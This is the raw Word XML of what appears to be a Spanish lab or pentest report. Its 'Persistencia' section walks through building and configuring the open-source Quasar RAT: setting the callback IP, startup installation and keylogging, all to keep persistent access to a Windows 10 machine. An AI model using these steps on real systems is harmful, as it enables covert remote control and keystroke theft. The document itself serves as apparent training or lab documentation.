          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DA1548A" wp14:editId="113513EB">
            <wp:extent cx="5400040" cy="1105535"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="729569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9692" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId234" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="1105535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7953C6" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="488F91F2" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Por último comprobaré que pertenece a ese grupo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DEC189" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AB38FB1" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C49D36C" wp14:editId="7740A0C9">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="207150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6355" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId235"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ACA401D" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45364795" w14:textId="77777777" w:rsidR="003927F1" w:rsidRDefault="003927F1" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="140EC3FE" w14:textId="77777777" w:rsidR="003927F1" w:rsidRDefault="003927F1" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="276E112F" w14:textId="77777777" w:rsidR="003927F1" w:rsidRDefault="003927F1" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48F8752F" w14:textId="77777777" w:rsidR="003927F1" w:rsidRDefault="003927F1" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A858A5E" w14:textId="551CA77E" w:rsidR="003927F1" w:rsidRDefault="003927F1" w:rsidP="003927F1">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc135575996"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Persistencia -&gt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="24AC5783" w14:textId="77777777" w:rsidR="003927F1" w:rsidRDefault="003927F1" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3534DCAE" w14:textId="60E6ACE6" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora empezaremos con la parte de persistencia y para eso instalaré un RAT, llamado </w:t>
      </w:r>
      <w:r w:rsidR="000F35DB">
        <w:t>Q</w:t>
      </w:r>
      <w:r>
        <w:t>uasar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5933A3" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A0C07DE" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Para esta instalación usaré una máquina Windows 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A96C2D0" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRPr="00AD6B66" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD6B66">
        <w:t>Quasar RAT es un software RAT de código abierto que se utiliza para controlar de forma remota dispositivos Windows. Este software permite a los usuarios controlar de forma remota y administrar computadoras, lo que puede ser útil para el soporte técnico o la administración de sistemas, pero también puede ser utilizado con fines maliciosos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BC865F" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para descargar Quasar necesitaremos descargarlo desde su GiHub: </w:t>
      </w:r>
      <w:hyperlink r:id="rId236" w:history="1">
        <w:r w:rsidRPr="009F6A3A">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://github.com/quasar/Quasar</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D3899B" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09AA9154" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65FACDE9" w14:textId="70C456BF" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3740D6B2" wp14:editId="28C85B04">
            <wp:extent cx="5400040" cy="2542540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="103629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351" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId237" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2542540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA41DA3" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E791101" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="004418AA" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tendremos también que descargar Visual Studio, y además el .NET Developer 4.5.2 en este enlace: </w:t>
      </w:r>
      <w:hyperlink r:id="rId238" w:history="1">
        <w:r w:rsidRPr="009F6A3A">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://support.microsoft.com/en-us/topic/the-microsoft-net-framework-4-5-2-developer-pack-for-windows-server-2012-r2-windows-8-1-windows-server-2012-windows-8-windows-server-2008-r2-sp1-windows-7-sp1-windows-server-2008-sp2-and-windows-vista-sp2-3fe675dd-2668-0657-a8be-63b7cca08512</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="575558FF" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FEE9247" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Una vez realizado todos estos pasos, descomprimiremos el zip descargado de GitHub que contiene el proyecto, y haremos clic en Quasar.sln, y se nos abrirá el proyecto en Visual Studio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120B8B60" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="593631F5" w14:textId="0F03F3D4" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25ADD11A" wp14:editId="22A5CD82">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1301493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3434" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId239"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4C0B37DF" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6151BF46" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EE4A8A6" w14:textId="2526E55D" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6039DA67" wp14:editId="6B53A723">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="142400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01876" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId240"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42D31297" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08D7D7D7" w14:textId="5FFDBA23" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Le daremos  a Build Solution y compilaremos el programa, una vez hecho esto en la carpeta /bin del proyecto descargado de Git tendremos los ejecutables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72138CE7" w14:textId="3271630A" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42F1574A" wp14:editId="4B89990E">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="302101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1341" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId241"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02253FF0" w14:textId="1221EFB1" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AF50270" wp14:editId="10BB628C">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="81768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89135" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId242"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A81AEF9" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14AFBB28" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora ejecutaremos Quasar.exe, para configurar el servidor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558BCEAE" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BD39445" wp14:editId="2EECEDF2">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1524338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38780" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId243"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06DD2BF" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D06B6EA" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Haremos clic en settings para configurarlo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662A74E9" w14:textId="565A2A89" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C1EB4C4" wp14:editId="6F498510">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1224617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17927" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId244"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A17217F" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FDEFADF" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Y le daremos a Save.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACE6678" w14:textId="77777777" w:rsidR="003927F1" w:rsidRDefault="003927F1" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="384B277C" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora haremos clic en Builder:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443F6867" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26AC8CAA" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BA5645C" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13CDD534" w14:textId="2F013A82" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D2E4A11" wp14:editId="02D31A76">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14674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359" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId245"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6CE6CABF" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03BAC274" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00D931AB">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Cambiaremos el nombre del cliente a Windows10:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D72BACC" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2489E197" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10E52E9F" w14:textId="4110B914" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39991D17" wp14:editId="41FDD99E">
            <wp:extent cx="5104762" cy="4333333"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="638558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8846" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId246">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5104762" cy="4333333"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20724B84" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03E0DD53" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00D931AB">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>En Connection Settings, configuraremos la IP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB64E8A" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E7D97FA" w14:textId="133C3939" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="086C0CA9" wp14:editId="342E77C7">
            <wp:extent cx="5104762" cy="4333333"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="36964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4707" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId247">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5104762" cy="4333333"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="053574E7" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863"/>
    <w:p w14:paraId="6ED26E3C" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00D931AB">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>En Installation Settings, marcaremos Install Client y le daremos  Build Client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD422B9" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6078175C" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D14EA24" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6590A251" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="124E7EEA" w14:textId="3F4EB4DB" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="497D1445" wp14:editId="5E7F6552">
            <wp:extent cx="5152381" cy="4323809"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1629910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0848" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId248">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5152381" cy="4323809"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDF7FD2" w14:textId="77777777" w:rsidR="00530607" w:rsidRDefault="00530607" w:rsidP="00530607">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="724A2BA9" w14:textId="41F0B176" w:rsidR="00530607" w:rsidRPr="00530607" w:rsidRDefault="00530607" w:rsidP="00530607">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00530607">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Simplemente marcando la opción de que se inicie el cliente cuando el ordenador encienda, y la ruta donde vamos a guardar ese ejecutable que nos permitirá la conexión</w:t>
      </w:r>
      <w:r w:rsidR="0039186B">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, de esta manera ganaremos persistencia en el sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E2018A" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863"/>
    <w:p w14:paraId="2E61CFD8" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00D931AB">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>También podemos activar la opción para que guarda las teclas pulsadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3FB3D0" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13A96F42" w14:textId="77777777" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2661A2AD" w14:textId="084D1513" w:rsidR="00EF0863" w:rsidRDefault="00EF0863" w:rsidP="00EF0863">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="102E3E2A" wp14:editId="591396F1">
            <wp:extent cx="5076190" cy="4266667"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1463467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7917" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
